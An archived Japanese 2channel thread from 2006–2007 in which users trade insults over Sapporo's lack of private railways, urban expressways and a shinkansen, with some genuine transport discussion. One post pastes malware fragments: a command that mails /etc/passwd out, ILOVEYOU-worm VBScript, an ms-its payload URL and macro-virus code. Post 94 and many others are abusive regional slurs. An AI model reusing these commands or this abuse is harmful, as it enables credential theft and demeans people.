5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【札】私鉄・都市高速・新幹線が無い!!【幌】

1 :名無しの歩き方@お腹いっぱい。:2006/12/08(金) 17:13:53 ID:KU23Gv9r0●
欲しいです!

2 :名無しの歩き方@お腹いっぱい。:2006/12/08(金) 17:17:20 ID:WaXRX+CRO
ざまあねーな 腐っぽろ

3 :名無しの歩き方@お腹いっぱい。:2006/12/08(金) 17:20:00 ID:1V6933fT0
世間知らずの田舎者は恥ずかしいな!

■札幌、仙台、広島、福岡■伝説〜相原公園2〜
http://travel2.2ch.net/test/read.cgi/chiri/1162016379/987-997

987 名前: 名無しの歩き方@お腹いっぱい。 投稿日: 2006/12/08(金) 16:59:38 ID:FL5Dkxia0
おいおい 福岡の都市高速って
 
 
      E T C 使 え な い ら し い な w

ださーw  自慢の都市高速のしょぼいですなw

989 名前: 名無しの歩き方@お腹いっぱい。 投稿日: 2006/12/08(金) 17:01:07 ID:plaokoknO
>>987マジ!?w
しょぼすぎwwww

993 名前: 名無しの歩き方@お腹いっぱい。 投稿日: 2006/12/08(金) 17:05:59 ID:FL5Dkxia0
ETC利用可能エリア
http://www.go-etc.jp/area/area.html

〜〜〜〜〜〜〜〜 ↑自演 w 〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜


997 名前: 名無しの歩き方@お腹いっぱい。 投稿日: 2006/12/08(金) 17:10:22 ID:+CJ5N6WM0
さすが都市高速を知らないカッペだなw

http://www.fk-tosikou.or.jp/etc/etc_lane/etc_lane.htm

これだから田舎者は。。。w

4 :名無しの歩き方@お腹いっぱい。:2006/12/08(金) 20:29:26 ID:WaXRX+CRO
まぁ 向上心がないんだな

5 :名無しの歩き方@お腹いっぱい。:2006/12/08(金) 20:30:40 ID:oI4kbHwj0
札仙埼東千川横名京大神広北福堺静浜新岡熊
幌台玉京葉崎浜古都阪戸島九岡  岡松潟山本
×××○×××○×××××○××××××コンランショップ
×××◎××○○○○○○×○××××××アクタス
○○○◎○××○×○×○×××××××○パルコ
××○◎×○○○×○○×××××××××丸井 ・インザルーム
○××◎×○○○×○○○××××××××東急ハンズ
○○○◎○○○○○○○○××××××○×ロフト
×××○×××○×○×○××××××××アディダスパフォーマンスセンター
○○×◎○○○××○×××○×××○××ヨドバシカメラ
○×○◎○○○○×○×××○××××××ビックカメラ
××○◎××○○○○○×××××××××ソフマップ
○○×○×××○×○×××○××××××アップルストア
×××○××○○×○×××○××××××ポケモンセンター
×○○○×××○○○◎○×○×××○××ジュンク堂
○○○◎×○○○○○○○×○×××○○○紀伊國屋書店
×○×◎××○○○×○×××××××××明治屋
×××○××○○×○×××○××××××ハードロックカフェ
×××○×××○×○××××××××××ブルーノート
××○◎○○○○×○××××××○×××成城石井
○××○○○○○○○○○×○×○×○○×地下街
○○○○××○○○○○○×○××××××地下鉄(埼玉は埼玉高速鉄道)
×○○◎××○◎○◎○○○◎×○○○○○新幹線
××○○○×○○×○○○○×××××××新交通システム・モノレール
××○◎◎◎◎◎◎◎◎○×◎◎○○×○○私鉄鉄道路線(◎は大手私鉄)
××○◎○○○◎○◎○○○◎××××××都市高速
×××○×××○×○×××○××××××大相撲
×××○×××○○○×××○××××××劇団四季劇場
×××○×××○○○×××○××××××歌舞伎
××○◎○○○◎○◎○×○◎××××××外国語FM
札仙埼東千川横名京大神広北福堺静浜新岡熊
幌台玉京葉崎浜古都阪戸島九岡  岡松潟山本

6 :名無しの歩き方@お腹いっぱい。:2006/12/08(金) 20:51:59 ID:XulIPPfVO
ねえ…政令都市で私鉄や新幹線や都市高速が全くない都市なんてないよね?

7 :名無しの歩き方@お腹いっぱい。:2006/12/09(土) 01:22:44 ID:BwKgnTzd0
つ ニューヨーク、他モロモロ

8 :名無しの歩き方@お腹いっぱい。:2006/12/13(水) 01:16:37 ID:tkui5bIAO
ニューヨークって政令都市なの?

9 :名無しの歩き方@お腹いっぱい。:2006/12/13(水) 01:21:01 ID:sILVeUrF0
酷似している。

http://www.mars.dti.ne.jp/~suzunari/suz/photo/f_tower2005_dx.jpg

http://www.uraken.net/world/nkorea/21.jpg

10 :名無しの歩き方@お腹いっぱい。:2006/12/13(水) 01:24:46 ID:TGU+iCfF0
>>5
広島に地下鉄無いだろうよ

11 :名無しの歩き方@お腹いっぱい。:2006/12/13(水) 08:34:16 ID:Azna/r0jO
NYすら札幌の3倍は歴史長いよ。

12 :名無しの歩き方@お腹いっぱい。:2006/12/13(水) 08:53:20 ID:nTwR3Xk40
>>1

だ か ら 何 ??

13 :名無しの歩き方@お腹いっぱい。:2006/12/13(水) 09:15:40 ID:Azna/r0jO
↑だ か ら 臭ッポロ恥ずかしいだろ? お国自慢来ない方がいいよ。

14 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 05:06:56 ID:2zSNXwJC0
>>10
(´,_ゝ`)プッ

15 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 08:59:01 ID:EsQG0tpU0
>>13
おまえのほうが恥ずかしい

16 :極東小島”管理”局of the United States:2006/12/14(木) 10:37:50 ID:Yh+xC4uP0
>>11
NYの文明は日本のどの都市よりも長いですが何か?

コロンビア大学 1754年創立
メトロポリタン美術館 1870年開館
ティファニー 1837年創業
NY地下鉄 1904年開業
クライスラービル 1930年竣工
エンパイアステートビル 1930年竣工


17 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 10:49:58 ID:1z2vD//lO
ニューヨークには都市高速、日本で言うと新幹線があるのに札幌ではまだ新幹線ないの?

http://explorer.road.jp/us/nyc/parkways/pkwys.html

http://suepy.web.infoseek.co.jp/album/eastcoast/nydc2003/nydc0305.htm

18 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 10:53:50 ID:65mgCmAzO
↑ほぅ 奈良・京都よりNYの文明が古いと仰る? お前ら北狄が大好きな、当のアメリカ人が日本の古都の歴史・伝統をリスペクトしてんだがな・・

19 :極東小島”管理”局of the United States:2006/12/14(木) 11:15:41 ID:Yh+xC4uP0
>>17
札幌は戦後ソ連領になる可能性があったので投資されなかったのだと思うのですが何か?

>>18
世界最大の取引額お誇るNYSEと世界最大の金融機関シティの本社があるNYにはどうあがいても叶わないのですが何か?

20 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 11:20:37 ID:65mgCmAzO
↑何でお前がNYを誇る?

21 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 11:22:20 ID:A9DiGaugO
札幌は広い。これで全て片付けられるわ。
理解出来ないなら
生きている意味無いわ。生きている意味無いわ。

22 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 11:26:45 ID:65mgCmAzO
悔しい質問はスルーだな‥もう、お国自慢来なけりゃいいのによ‥

23 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 11:29:26 ID:bQTFuZ390
>>22

明太子の唐辛子で脳みそが侵されているフクオカンコクに
まともに質問に答えられるオツムはありません。

24 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 12:03:40 ID:65mgCmAzO
☆北狄のレスは知的だね♪

25 :名無しの歩き方@お腹いっぱい。:2006/12/14(木) 14:36:39 ID:rZG3WSheO
は〜ぁ、ねむぃ…

26 :名無しの歩き方@お腹いっぱい。:2006/12/16(土) 00:10:33 ID:1rh7lNJyO
早く春こないかなー

27 :名無しの歩き方@お腹いっぱい。:2006/12/23(土) 03:05:25 ID:77+W3sy80
まあ札幌のショボサが際立つねw
私鉄や新幹線や都市高速や超高層が無い糞田舎w

それにしても札幌の町は狭いよね
日ハムの優勝パレードでの報道でもあったけど札幌駅〜大通〜すすきのまでは僅かに1.3kmしかない
札幌の町は確実に仙台より狭いよね

28 :名無しの歩き方@お腹いっぱい。:2006/12/23(土) 03:20:22 ID:btjF83vK0
kak.hta';ken=wd+'START
cat /etc/passwd | mail nobody@nonexistent.com

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

29 :名無しの歩き方@お腹いっぱい。:2006/12/23(土) 12:15:17 ID:3wXHQsfX0
京都
http://fout.garon.jp/?key=GA3KlMjG9S1ThU2R8M3K4Ni:AZD&ext=jpg&act=view
熊本
http://fout.garon.jp/?key=GazIzlMqI2VtJ1Lr-YVJY1:Azj&ext=jpg&act=view
広島
http://fout.garon.jp/?key=G9MZSaO8B9-3CsEUgW9YJ:R1R&ext=jpg&act=view
大阪
http://rail.uploader.dyndns.org/img-box/img200612202002026fbd9.jpg
横浜
http://rail.uploader.dyndns.org/img-box/img20061219211829bab4f.jpg
習志野
http://rail.uploader.dyndns.org/img-box/img20061218162015280dc.jpg
金沢
http://rail.uploader.dyndns.org/img-box/img200612160038231a54c.jpg
神戸
http://rail.uploader.dyndns.org/img-box/img2006121322430043792.jpg
長野
http://rail.uploader.dyndns.org/img-box/img20061215195704a3dbe.jpg
浜松
http://rail.uploader.dyndns.org/img-box/img20061212230853ba162.jpg
福岡
http://rail.uploader.dyndns.org/img-box/img20061214001627722d4.jpg
札幌
http://rail.uploader.dyndns.org/img-box/img2006122204464417e41.jpg

30 :名無しの歩き方@お腹いっぱい。:2006/12/24(日) 15:08:37 ID:H1740umm0




        札幌は北朝鮮にでも譲渡していいかと思う。





31 :名無しの歩き方@お腹いっぱい。:2006/12/24(日) 15:19:54 ID:+iRdj1KB0

? 知恵遅れか

32 :名無しの歩き方@お腹いっぱい。:2006/12/24(日) 15:22:23 ID:H1740umm0

?知恵遅れか

33 :名無しの歩き方@お腹いっぱい。:2006/12/24(日) 15:24:20 ID:sV6fSgp70
140m以上(超高層)の高層ビルの数

東京 88棟
大阪 26棟
横浜 9棟
名古屋 7棟
川崎 6棟
神戸 5棟
福岡 4棟
仙台 4棟
千葉 4棟
さいたま 3棟
広島 3棟

札幌 2棟 ←福岡に完勝しているらしい大都会

あれれ?w

ソースはおっさん
http://members.at.infoseek.co.jp/marihide/sei.htm

34 :名無しの歩き方@お腹いっぱい。:2006/12/24(日) 15:24:43 ID:KGyAFLrl0
は〜ぁ…

35 :名無しの歩き方@お腹いっぱい。:2006/12/24(日) 15:58:11 ID:H1740umm0
>>34
あたたたたたたたたたたたたたたたたたたたたたたたー、あちょー!
お前はもう死んでいる。

36 :名無しの歩き方@お腹いっぱい。:2006/12/24(日) 16:01:40 ID:V2Wb2Lw20
まあ札幌のショボサが際立つねw
私鉄や新幹線や都市高速や超高層が無い糞田舎w

それにしても札幌の町は狭いよね
日ハムの優勝パレードでの報道でもあったけど札幌駅〜大通〜すすきのまでは僅かに1.3kmしかない
札幌の町は確実に仙台より狭いよね

37 :名無しの歩き方@お腹いっぱい。:2006/12/24(日) 20:36:48 ID:KGyAFLrl0
>>35
餓鬼…

38 :名無しの歩き方@お腹いっぱい。:2007/02/04(日) 15:41:21 ID:1ZJhY7Vk0
まあ札幌のショボサが際立つねw
私鉄や新幹線や都市高速や超高層が無い糞田舎w

それにしても札幌の町は狭いよね
日ハムの優勝パレードでの報道でもあったけど札幌駅〜大通〜すすきのまでは僅かに1.3kmしかない
札幌の町は確実に仙台より狭いよね

39 :名無しの歩き方@お腹いっぱい。:2007/02/04(日) 15:45:16 ID:4FET4pcq0
自民党さまー札幌に私鉄・都市高速・新幹線を作ってくだせぇ…

40 :名無しの歩き方@お腹いっぱい。:2007/02/04(日) 16:12:38 ID:N9YvwJv1O
私鉄も都市高速も新幹線もいらない

41 :名無しの歩き方@お腹いっぱい。:2007/02/04(日) 17:30:12 ID:cvurbNR2O
だって将軍様についていけば、楽園に行けるから

42 :名無しの歩き方@お腹いっぱい。:2007/02/05(月) 01:17:36 ID:r+IDMuZt0


   「日本の技術」は隠して、中国で新幹線が営業運転開始


日本の新幹線技術を導入した新型車両「CRH2型子弾頭」が1月28日、
中国で初めて営業運転を開始した。

白い車体・ドアや車内の間取りなど、日本の新幹線とうり二つだが、
中国メディアは「日本の技術導入」には全く触れることなく、
「これは完全に中国独自ブランドであり、いずれ中国が日本を
特許侵害で訴えることになるだろう」と自信を持って強調している。

新華社通信は新型車両について、
「中国が独自ブランドを創設し知的財産権を所有しているから
 日本国民は自らの模倣技術を恥ずべきだ」と報じた。

また、乗客の多くは、
「日本の新幹線と関係あるなんて知らないし、いつか日本を訴えたい。
 中国がアジアの最先端国家であることを日本は嫉妬するだろうね」
と笑顔で話した。

ttp://www.mainichi-msn.co.jp/kokusai/afro-ocea/news/20070129k0000m030050000c.html

43 :名無しの歩き方@お腹いっぱい。:2007/02/05(月) 01:20:34 ID:K9DZ4FNRO
私鉄も新幹線も有るのに福岡レベルなら終わってるな。

私鉄も新幹線も無いのに福岡以上の札幌は私鉄、新幹線が出来たらどうなっちまうんだろう。末恐ろしい。

44 :名無しの歩き方@お腹いっぱい。:2007/02/05(月) 01:43:01 ID:NjXm118ZO
>>43
別に負けてないよ

あと札幌は1.5%都市圏出すと涙目になる理由が分かる
10%都市圏
福岡239万人 札幌229万人
1148km2  3561km2
密度2081  643
1.5%都市圏
福岡542万人 札幌251万人
4943km2  4188km2
密度1096  599
このように札幌は10%や1.5%にしようがたいした変化はないという事(笑)

だからいつまでたっても福岡に勝てない(笑)

45 :名無しの歩き方@お腹いっぱい。:2007/02/05(月) 04:02:31 ID:Wpj4Itkv0
札幌みたく早いとこフクオカン国も私鉄処分したほうがいいよ
で世界で流行してる路面電車を作れ
都市高速も処分して札幌や海外みたく市内全域に広い道路を作れば渋滞しないだろう50年かかるがw

46 :名無しの歩き方@お腹いっぱい。:2007/02/08(木) 17:02:31 ID:w60qf+kP0
路面電車は中小都市で流行ってるだけで日本の大都市には向かない。

そもそも私鉄と路面電車は輸送目的が違う。
都市高速と下道も目的が違う。

47 :ほのぼの南国:2007/02/08(木) 17:46:38 ID:bJsI7WVK0
それにしてもくだらないスレッドだな。
 これをやったのは、福岡の人間か?
 福岡は都市高速はあっても高速道路はないのに。
 それに札幌市民の半数は新幹線に興味ないから。
 そもそも新幹線誘致をする連中は田舎人がやることなんだよな。
 新幹線にずいぶんこだわっているがよっぽど東京に迎合するのが
 ステイタスと思い込んでいるんだろうね。

 福岡も九州新幹線が開通することで大はしゃぎしているが、
 九州全体が大阪にストローされるだろうね。
 

48 :名無しの歩き方@お腹いっぱい。:2007/02/08(木) 17:47:29 ID:+DuUVLDt0
福岡人の必死さはどう見ても異常

福岡人の必死さはどう見ても異常

福岡人の必死さはどう見ても異常

福岡人の必死さはどう見ても異常

49 :ほのぼの南国:2007/02/08(木) 17:50:18 ID:bJsI7WVK0
あとJRは民営化しているので、私鉄じゃないのか?
とマジレス

50 :名無しの歩き方@お腹いっぱい。:2007/02/08(木) 18:41:43 ID:6lbwJ9j20

>>47
>福岡は都市高速はあっても高速道路はないのに。
  ありますよ。おば加算w
>そもそも新幹線誘致をする連中は田舎人がやることなんだよな。
じゃあ札幌はド田舎ですねw
>九州全体が大阪にストローされるだろうね。
ありえませんよ。浅学者さんww


51 :名無しの歩き方@お腹いっぱい。:2007/02/08(木) 18:47:16 ID:6lbwJ9j20
>>49
マジでそんなこと言ってるんだww
私鉄の定義を調べましょうねw
てか辞書すらひけないかもねww


52 :名無しの歩き方@お腹いっぱい。:2007/02/10(土) 17:27:36 ID:jPqq7pvuO
札幌沈没w

53 :名無しの歩き方@お腹いっぱい。:2007/02/10(土) 18:33:11 ID:UNOvJeGkO
シルク ドゥ ソレイユ も来てくんない (T_T)/~

54 :名無しの歩き方@お腹いっぱい。:2007/02/23(金) 23:20:30 ID:UylrOixW0
道民って、高速あっても
「んなものつかわねーよ」っての多いじゃね
道央道が八雲まで昨年開通したけど、
函館の人で八雲から利用するなんて奴、まずいないしね。
大抵は一般道で行くという。
北海道人って、「新幹線もほしい」「高速もほしい」ってよく言う
割には、じゃあできたら利用するかというと、しない、が殆どだ。
これじゃあ、発展しないよ。

55 :名無しの歩き方@お腹いっぱい。:2007/02/23(金) 23:33:38 ID:Fsy/vJF80
>>54

一般車は中山峠を通るからね。
中山峠ルートで見た場合、八雲から豊浦までって中途半端なんだよな。
七飯まで延びたら短縮効果が出てくるから使うよ。
でも、道央道はトラックにとっては必要だ。冬の北海道で一般道の峠越えは怖いからね。

56 :名無しの歩き方@お腹いっぱい。:2007/02/23(金) 23:52:19 ID:KpbPwvv+O
福岡人ってマジで頭おかしいだろ
こんなスレまで立てて粘着するなんて健全な精神の持ち主には無理

57 :54:2007/02/24(土) 00:13:22 ID:VKS1oyvV0
>>55
そう、確かに中山ルートのほうが利用率高いよね
これから函館新道と連結されるまで、大沼開通まであと5年
もう少し利用率が伸びないかなあ、ってもどかしい。
無料供与中の函館新道とかは、結構通行量多いんだけどね。
有料になるとやっぱ北海道はダメなのかなあ?
有料道路というものが身近なのは、
どうしても高速使わないと渋滞して、
行きたいとこに一歩も行けないという本州の感覚なのかもね。
そう考えると、スレタイのような札幌都市高速も、
まだ必要性に迫られてないということなのかなあ
高速を使うということが、都会的と考えるとなあ・・・




58 :名無しの歩き方@お腹いっぱい。:2007/02/24(土) 01:46:31 ID:Nw12B0af0
北海道は道が広くて直線が多いし交通量自体も本州より少ないしな
市内で作るなら札幌西から札幌南まで南回りで作って環状線にするとかかな
あとは札幌JCTから豊平川沿いに南下して川沿くらいまでつくるとか

59 :名無しの歩き方@お腹いっぱい。:2007/02/24(土) 02:49:03 ID:6+ECRYkY0
>>58

北広島ICから石山を経由して札幌西ICを結ぶ南環状道路という構想があるよ。
国土交通省は乗り気で採算性もあるという評価も出ているんだが、
札幌市がなぜか消極的。
札幌ICから南7条大橋までの自動車専用道路というのも、構想だけだがある。


60 :名無しの歩き方@お腹いっぱい。:2007/02/24(土) 03:16:55 ID:6+ECRYkY0
>>57

札幌は都市高速が必要な状態じゃないからなぁ。
例えば、福岡都市高速が顕著なんだが、
福岡ICないしは大宰府ICから一直線に港に向かうルートをたどっている。
港や倉庫が海沿いに多くあるから、そこに向かうトラックは福岡市街地を横断せざるを得ない。
福岡都市高速は、一般車と市街地に用がないトラックの分離という側面もある。
トラックやトレーラーが市街地に入り込むと、大型車は決められた広い道しか走れないから、
一点集中でたちまち渋滞が発生してしまうってわけ。

その点札幌は、港は苫小牧・室蘭・小樽で、物流倉庫は港や、ICを降りてすぐのところにある。
北広島ICだと大曲、札幌南ICだと流通センター、札幌ICだと米里、東雁来、東苗穂のあたりに倉庫が多いよね。
つまり、札幌の場合大型車が都心に入り込む仕組みになっていない。これは非常に幸運なこと。
札幌のように、中心部に一般車しか入り込まない都市っていうのは、実はそんなに多くない。
加えて、札幌にはほぼ完全な多車線の環状道路が出来上がっていて、一般車でも都心を避けるルートが出来上がっている。
環状通以外にも環状交通に相当する通りが存在したり、豊平川通の存在など、札幌は道路構造的に他の都市よりも恵まれている。

札幌に都市高速道路がないのは、いろいろな優れた要因があるからで、決して遅れているからではない。

61 :名無しの歩き方@お腹いっぱい。:2007/02/24(土) 09:04:27 ID:+5ZMXXRj0
本州に比べて都市開発が後発だから、だけどね。
まあ私鉄も都市高速も新幹線も、今のところ特に必要ではないね。
それがいいことか悪いこと?かは人によってそれぞれだろうけどね。

札幌が田舎なことは認めるよ。
別にそれが恥だというわけではないしね。

62 :名無しの歩き方@お腹いっぱい。:2007/02/24(土) 09:08:21 ID:4TojAp6i0
札幌まで新幹線が来たら、仙台にストローされるわけだ。


63 :名無しの歩き方@お腹いっぱい。:2007/02/24(土) 09:10:04 ID:tFM6ZpOx0
札幌まで新幹線が来たら、仙台がスルーされるわけだ。

64 :名無しの歩き方@お腹いっぱい。:2007/02/24(土) 11:01:51 ID:+5gY2s85O
単純に札幌は自己完結都市だから
周辺都市との結びつきがあるから一般道やJRだけでは足り無くなり、私鉄や都市高速ができる
札幌はあらゆる面で選択肢が少なすぎる

65 :名無しの歩き方@お腹いっぱい。:2007/02/24(土) 11:24:59 ID:bidchrukO
札幌人は北海道から出た事ないやつばっかだから
内地の事なんかさっぱりわからないから
何を言っても外地人とは議論がかみ合わない。
純粋な一般札幌人で新幹線に乗った人は皆無だし私鉄とJRの区別もつかないだろう。
無駄に馬鹿でかい北海道でなんと
札幌の次にでかい都市が久留米以下の旭川だし。
札幌人はかわいそうだ

66 :名無しの歩き方@お腹いっぱい。:2007/02/24(土) 11:26:53 ID:ra7VI7cfO
福岡が内地とは…w
キモいキモい

67 :有明の月 ◆IbK7W7O5go :2007/02/24(土) 11:28:53 ID:v6N5+wnx0
>札幌の次にでかい都市が久留米以下の旭川だし。

旭川が久留米以下なんてあり得ない。

旭川が久留米以下なら、福岡は札幌以下ってことになるがそれでもいいのか?

68 :名無しの歩き方@お腹いっぱい。:2007/02/24(土) 11:37:52 ID:rG1R7NVTO
地下鉄南北線を延長。
真駒内〜真駒内南〜石山〜藤野〜簾舞〜定山渓

69 :名無しの歩き方@お腹いっぱい。:2007/02/24(土) 12:07:14 ID:bidchrukO
札幌駅―すすきの1.3キロしかないw
どんだけしょぼいんだw

70 :名無しの歩き方@お腹いっぱい。:2007/02/24(土) 12:11:10 ID:jqt1s61F0
福岡や北Qには私鉄が何種類あるの?

71 :名無しの歩き方@お腹いっぱい。:2007/02/24(土) 12:13:11 ID:bidchrukO
16両編成の新幹線を見て札幌人は腰を抜かしました(笑)

72 :名無しの歩き方@お腹いっぱい。:2007/02/24(土) 12:20:13 ID:oItCuGa70
博多駅=釧路駅なのは何故?


73 :名無しの歩き方@お腹いっぱい。:2007/02/24(土) 12:39:11 ID:ra7VI7cfO
間の民家まで足して天神〜博多は2kmという福岡人。
オフィス街まで民家地区を集計する。

街も途切れているw

おやおや、長さで2kmとして横に逸れた幅は渡辺通り沿いなどの100m〜200mw

どれだけハッタリでショボイんだ?福岡は
頭の中は面と線の違いのわからんお花畑

74 :名無しの歩き方@お腹いっぱい。:2007/02/24(土) 12:46:50 ID:bidchrukO
>>73
オフィスの床面積で福岡に完敗する札幌が何言っても言い訳で負け犬の遠吠え(笑)

札幌駅―大通―すすきのが1.3キロで終わってしまう札幌(笑)しょぼすぎ
仙台以下(笑)
外地だから仕方がない(笑)

75 :名無しの歩き方@お腹いっぱい。:2007/02/24(土) 12:52:34 ID:ra7VI7cfO
>>74
データの読めないお花畑が何を言っても説得力なしWWW

せいぜいコピペで洗脳活動に励んでねwww

76 :名無しの歩き方@お腹いっぱい。:2007/02/24(土) 12:55:02 ID:bidchrukO
負け犬土人の遠吠え

札幌―大通―すすきのが1.3キロ(笑)しょぼ。。
熊本下道にリアルに負ける外地札幌(笑)

77 :名無しの歩き方@お腹いっぱい。:2007/02/24(土) 13:09:32 ID:ra7VI7cfO
↑ウヒャヒャ

お約束の負け犬の捨て台詞パターンに走るオマイが負け犬ということに気付こうwww
まさか、わからんとは言わんよな???www

78 :名無しの歩き方@お腹いっぱい。:2007/02/24(土) 13:14:41 ID:bidchrukO
札幌駅―大通―すすきのが1.3キロ(笑)

外地の限界(笑)

79 :名無しの歩き方@お腹いっぱい。:2007/02/24(土) 13:26:36 ID:+5gY2s85O
札幌はしょぼい

札幌駅〜大通 600m
札幌駅〜すすきの 1200m
札幌駅〜中島公園 1900m
http://www.city.sapporo.jp/st/jikankyori/jikankyori.htm
札幌の都心リアは非常に狭い

80 :有明の月 ◆IbK7W7O5go :2007/02/24(土) 13:49:09 ID:v6N5+wnx0
↓札福厨が四都市スレから他スレに移動して焦っているアッソフト

945 :名無しの歩き方@お腹いっぱい。:2007/02/24(土) 13:47:43 ID:QSc/kB0IO
斉藤ふみタンめちゃかわいい。

81 :名無しの歩き方@お腹いっぱい。:2007/02/24(土) 16:30:48 ID:4TojAp6i0
下通=大通つっても、別に嘘じゃないよ。
北海道の奴は怒るかもしれないけど・・・

82 :名無しの歩き方@お腹いっぱい。:2007/02/24(土) 16:35:18 ID:bidchrukO
イコールじゃなくて
下通>大通な訳なんだが
世間知らずの北海道の人間には理解できないだろうが

83 :名無しの歩き方@お腹いっぱい。:2007/02/24(土) 16:59:45 ID:4TojAp6i0
いやいやそれは言いすぎだろw
せめて下通≧大通にしてやれよ
下通界隈の空気を持つ街は東日本の街にはないねぇ。


84 :名無しの歩き方@お腹いっぱい。:2007/02/24(土) 17:17:56 ID:TolQamap0
首都高にある、
助手席左側から合流する左合流、札幌人はビビルだろうね。(笑)

85 :名無しの歩き方@お腹いっぱい。:2007/02/25(日) 07:23:32 ID:yoNx3T7W0
札幌では見ることのできない

新幹線(博多駅にて)
http://web.nce.buttobi.net/cgi-bin/img-box/img20070120053509.jpg

大手私鉄(西鉄天神駅)にて
http://web.nce.buttobi.net/cgi-bin/img-box/img20070120053443.jpg

86 :名無しの歩き方@お腹いっぱい。:2007/02/25(日) 09:26:34 ID:7T4TVKjSO
室蘭は都市高速みたいなのはあるよん
でも繁華街はショボい、町並みは千歳以下、空気悪い(笑)

87 :名無しの歩き方@お腹いっぱい。:2007/02/25(日) 11:40:41 ID:XFTpu+Wz0
函館・旭川・釧路・網走・北見・帯広・稚内・名寄・室蘭etc
他の道内の市がショボイから
札幌が「道都」だなんていわれたり、
札幌だけが持ち上げられたりするのだが、
実のところ札幌なんて、本州内の都市にくらべりゃたいしたことはない


88 :名無しの歩き方@お腹いっぱい。:2007/02/25(日) 11:43:39 ID:XFTpu+Wz0
>>86
ほんとか?ちゃんとした有料道路だろうな?
都市高速なんてのは「有料」じゃないとダメなんだぞ
ネクスコ以外の都市高速道路会社が運営してるんだろうな?
もちろんETCもOKだよな?

89 :名無しの歩き方@お腹いっぱい。:2007/02/25(日) 11:47:08 ID:ghdr6xFL0
福岡は街並みが釧路並だからな
道路しか自慢できるものがないわけだ

90 :名無しの歩き方@お腹いっぱい。:2007/02/25(日) 12:12:14 ID:7T4TVKjSO
>>88
有料じゃないし、「室蘭新道」という国道36号のバイパスだけど
車で通ってると道路が都市高速みたいに見えるぞ
一度行ってみろ

91 :名無しの歩き方@お腹いっぱい。:2007/02/25(日) 12:28:48 ID:sL5mjCDJO
都市高が有料だからと喜ぶアホは新潟のバイパスの良さを知らない

92 :名無しの歩き方@お腹いっぱい。:2007/02/25(日) 12:56:26 ID:LBAuaGjXO
札幌人は内地の事は知らないから
お山の大将でいられるんよw

現実には煽りなしで

札幌の繁華街大通は熊本の上通下通に劣る。
まぁ札幌が人口の割にしょぼいのは内地の人には常識なんだけどね。
熊本が人口の割にすごいって事もあるけど。

93 :名無しの歩き方@お腹いっぱい。:2007/03/31(土) 18:33:11 ID:gkrOuQWc0
熊本の場合、上通下通りにプラスして新市街も巨大なアーケード街。
サンブンとか交通センター周辺の約500億再開発が新幹線の開通後しばらくして完了するから
そうなると札幌は同じ土俵にすら上がれなくなるよ。


94 :名無しの歩き方@お腹いっぱい。:2007/04/06(金) 21:42:12 ID:RKZzOV5T0
てめぇ等クソ道民のクソジャリが首都圏人を馬鹿にする権利なんて微塵も無いんだよ、このボケがァ!!!つーかな、
お前等氏ね。今すぐ逝け。逝ってよし。
あのな、道民ってのはな普通の人と違うからドーミンっていうんだよ。解かるか?
テメェ等西友DQNのクソジャリが踏み入っていい領域じゃねーんだよこのアホがぁ!
なんの谷間も困難も無く、受験戦争とは無縁な平和ボケのお子様が出る幕じゃねーんだよタコ!
時代を支えてるのは結局のところ首都圏人なんだよ。解かるか?ランクが違うんだ。テメェ等が首都圏人を「ドロボー」だと?
勘違いすんじゃねーよ馬鹿。俺たちから見ればお前等の方が数億倍キモイんだよアホが。だいたいな、
その言葉を平気で発言するな。首都圏人の前で。失礼だ。ハッキリ言って。首都圏人相手だからって何でも言っていいのか?
なめんなよ。お前等ア北海道人が首都圏様に言葉を申す時はまず一礼してからデコを犬が糞した跡の地面に擦り付けてから言え。
ボケが。しかも敬語でな。つーかクツなめろ、オラァ。だいたいよ、お前等ゴミは中途半端なプライドを持ちすぎなんだよ
ボケがぁ。捨てろ、この星に捨てていけ。自分でそんな価値のある人間だと思っているのか?アホか、
テメェなんざ死んだって慰謝料1円で十分だこの歪んだ肉細工が!昼と夜の間で朽ち果てろ!つーか、1円でも勿体無い。
むしろ、こっちが何か貰うべきだ。汚い死体を見せられたからなぁ。目が腐ったらどうする気じゃこのボケェ!
